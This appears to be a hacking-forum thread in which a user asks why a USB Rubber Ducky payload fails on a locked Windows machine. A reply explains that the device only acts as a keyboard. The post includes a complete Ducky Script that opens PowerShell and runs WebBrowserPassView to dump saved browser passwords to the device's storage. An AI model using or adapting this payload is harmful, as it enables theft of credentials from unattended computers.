Jump to content

Twin Ducky does not run correctly on locked workstation


neutinq
 Share

Recommended Posts

This is really weird. I flashed my usb rubber ducky with twin ducky firmware via ducky flasher on Kali. Tried both regular and GPIO button ones, same result.

I am running a webbrowserpassview from nirsoft via inject.bin. When the workstation is unlocked, it runs correctly, provides password.txt file saved on the ducky SD card partition.

As soon as I lock the machine and insert the ducky/press the button, it starts blinking red/blue like it does something, but in the end just starts typing all of the script commands inside user logon prompt and not in the background?!

What am I doing wrong, guys? Please advise

DELAY 3000
GUI R
DELAY 200
STRING powershell
DELAY 200
ENTER
DELAY 2000
STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'Z' } | select name
DELAY 200
ENTER
DELAY 200
STRING cd $usbPath.name; ./p.exe /stext password.txt
DELAY 200
ENTER
STRING exit
DELAY 200
ENTER

Thank you

 

Link to comment
Share on other sites

neutinq, keep in mind that the rubber ducky is a kind of automated keyboard. Most of the time If your regular keyboard can't do something, your rubber ducky can't do it.

You can read the documentation here and search for awesome hak5 video on YT about the rubber ducky
here

 

Edited by quentin.lamamy
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...